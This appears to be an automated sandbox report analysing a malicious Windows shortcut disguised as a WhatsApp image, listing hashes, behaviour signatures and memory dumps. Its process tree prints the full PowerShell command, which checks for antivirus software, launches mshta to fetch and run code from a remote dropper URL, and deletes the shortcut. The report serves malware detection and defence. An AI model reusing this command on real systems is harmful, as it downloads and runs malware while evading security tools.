Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

WhatsApp G...pg.lnk

windows7-x64

10

WhatsApp G...pg.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/02/2024, 05:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk

  • Size

    1KB

  • MD5

    0365118a92333b6faa474aded6b3a6f2

  • SHA1

    0bcac8b38e4e338508606c897eb7e36ad9d8a68e

  • SHA256

    98e44c818340bc1657402ed6b463ae52247f6d52d45d4a5aa0e6fad5b4935b1e

  • SHA512

    08007340cd5d133aae544597937a9cb1de83f29ff068c1aec023f3182dac1b92f7b150d2e0ecb9392f756c8271a759198840718cba82387432093e691dac3eaf

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://thanhancompany.com/grip/FYI

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $u = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($v in $u ){if ($v.displayName -replace 'Windows Defender', ''){Exit}}.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://thanhancompany.com/grip/FYI;$SMAF = Get-Location;$SMAF = Join-Path $SMAF 'WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk';del $SMAF
      2⤵
      • Deletes itself
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3628
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://thanhancompany.com/grip/FYI
        3⤵
        • Blocklisted process makes network request
        PID:2996

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z42a00vi.bcp.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/3628-8-0x0000021A73AA0000-0x0000021A73AC2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3628-12-0x00007FFA885D0000-0x00007FFA89091000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3628-13-0x0000021A716E0000-0x0000021A716F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3628-14-0x0000021A716E0000-0x0000021A716F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3628-15-0x0000021A716E0000-0x0000021A716F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3628-18-0x00007FFA885D0000-0x00007FFA89091000-memory.dmp

    Filesize

    10.8MB

    Download